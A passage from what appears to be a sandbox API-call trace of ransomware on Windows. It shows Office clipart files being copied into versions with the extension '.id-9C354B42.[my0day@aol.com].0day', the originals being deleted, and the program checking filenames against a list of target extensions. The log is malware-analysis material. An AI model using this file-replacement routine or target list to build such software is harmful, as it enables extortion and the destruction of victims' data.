SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.074] SetEndOfFile (hFile=0x230) returned 1 [0054.075] CloseHandle (hObject=0x230) returned 1 [0054.075] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0054.075] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01039_.wmf")) returned 1 [0054.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0054.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0054.075] lstrlenW (lpString=".doc") returned 4 [0054.075] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.075] lstrlenW (lpString=".docx") returned 5 [0054.075] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.075] lstrlenW (lpString=".pdf") returned 4 [0054.075] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.075] lstrlenW (lpString=".xls") returned 4 [0054.075] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.076] lstrlenW (lpString=".xlsx") returned 5 [0054.076] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.076] lstrlenW (lpString=".ppt") returned 4 [0054.076] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0054.076] lstrlenW (lpString=".zip") returned 4 [0054.076] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.076] lstrlenW (lpString=".rar") returned 4 [0054.076] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.076] lstrlenW (lpString=".bz2") returned 4 [0054.076] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.076] lstrlenW (lpString=".7z") returned 3 [0054.076] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0054.076] lstrlenW (lpString=".dbf") returned 4 [0054.076] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0054.076] lstrlenW (lpString=".1cd") returned 4 [0054.076] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0054.076] lstrlenW (lpString=".jpg") returned 4 [0054.076] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.076] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1596) returned 1 [0054.076] CloseHandle (hObject=0x230) returned 1 [0054.077] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf")) returned 0x20 [0054.077] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0054.077] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0054.077] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.077] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.077] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0054.077] GetLastError () returned 0x0 [0054.077] ReadFile (in: hFile=0x230, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x63c, lpOverlapped=0x0) returned 1 [0054.079] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x640, lpOverlapped=0x0) returned 1 [0054.080] ReadFile (in: hFile=0x230, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.080] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.080] SetEndOfFile (hFile=0x1d8) returned 1 [0054.080] CloseHandle (hObject=0x1d8) returned 1 [0054.080] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.080] SetEndOfFile (hFile=0x230) returned 1 [0054.081] CloseHandle (hObject=0x230) returned 1 [0054.081] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0054.081] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf")) returned 1 [0054.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0054.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0054.081] lstrlenW (lpString=".doc") returned 4 [0054.081] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.081] lstrlenW (lpString=".docx") returned 5 [0054.081] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.081] lstrlenW (lpString=".pdf") returned 4 [0054.081] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.081] lstrlenW (lpString=".xls") returned 4 [0054.081] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.081] lstrlenW (lpString=".xlsx") returned 5 [0054.081] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.081] lstrlenW (lpString=".ppt") returned 4 [0054.081] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0054.082] lstrlenW (lpString=".zip") returned 4 [0054.082] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.082] lstrlenW (lpString=".rar") returned 4 [0054.082] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.082] lstrlenW (lpString=".bz2") returned 4 [0054.082] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.082] lstrlenW (lpString=".7z") returned 3 [0054.082] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0054.082] lstrlenW (lpString=".dbf") returned 4 [0054.082] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0054.082] lstrlenW (lpString=".1cd") returned 4 [0054.082] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0054.082] lstrlenW (lpString=".jpg") returned 4 [0054.082] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.083] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.083] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0054.083] GetLastError () returned 0x0 [0054.083] ReadFile (in: hFile=0x230, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x1f20, lpOverlapped=0x0) returned 1 [0054.085] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x1f30, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x1f30, lpOverlapped=0x0) returned 1 [0054.086] ReadFile (in: hFile=0x230, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.086] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.086] SetEndOfFile (hFile=0x1d8) returned 1 [0054.086] CloseHandle (hObject=0x1d8) returned 1 [0054.086] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.086] SetEndOfFile (hFile=0x230) returned 1 [0054.087] CloseHandle (hObject=0x230) returned 1 [0054.087] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0054.088] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf")) returned 1 [0054.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0054.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0054.088] lstrlenW (lpString=".doc") returned 4 [0054.088] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.088] lstrlenW (lpString=".docx") returned 5 [0054.088] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.088] lstrlenW (lpString=".pdf") returned 4 [0054.088] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.088] lstrlenW (lpString=".xls") returned 4 [0054.088] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.088] lstrlenW (lpString=".xlsx") returned 5 [0054.088] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.088] lstrlenW (lpString=".ppt") returned 4 [0054.088] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0054.088] lstrlenW (lpString=".zip") returned 4 [0054.088] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.088] lstrlenW (lpString=".rar") returned 4 [0054.088] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.088] lstrlenW (lpString=".bz2") returned 4 [0054.088] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.088] lstrlenW (lpString=".7z") returned 3 [0054.088] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0054.088] lstrlenW (lpString=".dbf") returned 4 [0054.088] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0054.089] lstrlenW (lpString=".1cd") returned 4 [0054.089] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0054.089] lstrlenW (lpString=".jpg") returned 4 [0054.089] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.089] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.089] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.089] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0054.089] GetLastError () returned 0x0 [0054.089] ReadFile (in: hFile=0x230, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x728, lpOverlapped=0x0) returned 1 [0054.091] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x730, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x730, lpOverlapped=0x0) returned 1 [0054.098] ReadFile (in: hFile=0x230, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.098] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.098] SetEndOfFile (hFile=0x1d8) returned 1 [0054.098] CloseHandle (hObject=0x1d8) returned 1 [0054.098] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.098] SetEndOfFile (hFile=0x230) returned 1 [0054.099] CloseHandle (hObject=0x230) returned 1 [0054.099] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0055.042] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf")) returned 1 [0055.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0055.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0055.043] lstrlenW (lpString=".doc") returned 4 [0055.043] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.043] lstrlenW (lpString=".docx") returned 5 [0055.043] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.043] lstrlenW (lpString=".pdf") returned 4 [0055.043] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.043] lstrlenW (lpString=".xls") returned 4 [0055.043] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.043] lstrlenW (lpString=".xlsx") returned 5 [0055.043] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.043] lstrlenW (lpString=".ppt") returned 4 [0055.043] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0055.043] lstrlenW (lpString=".zip") returned 4 [0055.043] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.043] lstrlenW (lpString=".rar") returned 4 [0055.043] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.043] lstrlenW (lpString=".bz2") returned 4 [0055.043] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.043] lstrlenW (lpString=".7z") returned 3 [0055.043] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0055.043] lstrlenW (lpString=".dbf") returned 4 [0055.043] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0055.044] lstrlenW (lpString=".1cd") returned 4 [0055.044] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0055.044] lstrlenW (lpString=".jpg") returned 4 [0055.044] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.386] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.386] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.387] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0055.387] GetLastError () returned 0x0 [0055.387] ReadFile (in: hFile=0x178, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x1d74, lpOverlapped=0x0) returned 1 [0055.388] WriteFile (in: hFile=0x1c4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x1d80, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x1d80, lpOverlapped=0x0) returned 1 [0055.389] ReadFile (in: hFile=0x178, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.390] WriteFile (in: hFile=0x1c4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.390] SetEndOfFile (hFile=0x1c4) returned 1 [0055.390] CloseHandle (hObject=0x1c4) returned 1 [0055.390] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.390] SetEndOfFile (hFile=0x178) returned 1 [0055.391] CloseHandle (hObject=0x178) returned 1 [0055.391] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0055.391] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf")) returned 1 [0055.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0055.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0055.391] lstrlenW (lpString=".doc") returned 4 [0055.391] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.391] lstrlenW (lpString=".docx") returned 5 [0055.391] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.392] lstrlenW (lpString=".pdf") returned 4 [0055.392] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.392] lstrlenW (lpString=".xls") returned 4 [0055.392] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.392] lstrlenW (lpString=".xlsx") returned 5 [0055.392] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.392] lstrlenW (lpString=".ppt") returned 4 [0055.392] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0055.392] lstrlenW (lpString=".zip") returned 4 [0055.392] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.392] lstrlenW (lpString=".rar") returned 4 [0055.392] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.392] lstrlenW (lpString=".bz2") returned 4 [0055.392] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.392] lstrlenW (lpString=".7z") returned 3 [0055.392] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0055.392] lstrlenW (lpString=".dbf") returned 4 [0055.392] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0055.392] lstrlenW (lpString=".1cd") returned 4 [0055.392] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0055.392] lstrlenW (lpString=".jpg") returned 4 [0055.392] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.393] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.393] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.393] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0055.393] GetLastError () returned 0x0 [0055.393] ReadFile (in: hFile=0x178, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x19e8, lpOverlapped=0x0) returned 1 [0055.394] WriteFile (in: hFile=0x1c4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x19f0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x19f0, lpOverlapped=0x0) returned 1 [0055.395] ReadFile (in: hFile=0x178, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.395] WriteFile (in: hFile=0x1c4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.396] SetEndOfFile (hFile=0x1c4) returned 1 [0055.396] CloseHandle (hObject=0x1c4) returned 1 [0055.396] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.396] SetEndOfFile (hFile=0x178) returned 1 [0055.397] CloseHandle (hObject=0x178) returned 1 [0055.397] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0055.397] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf")) returned 1 [0055.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0055.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0055.397] lstrlenW (lpString=".doc") returned 4 [0055.397] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.397] lstrlenW (lpString=".docx") returned 5 [0055.397] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.397] lstrlenW (lpString=".pdf") returned 4 [0055.397] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.397] lstrlenW (lpString=".xls") returned 4 [0055.397] lstrcmpiW 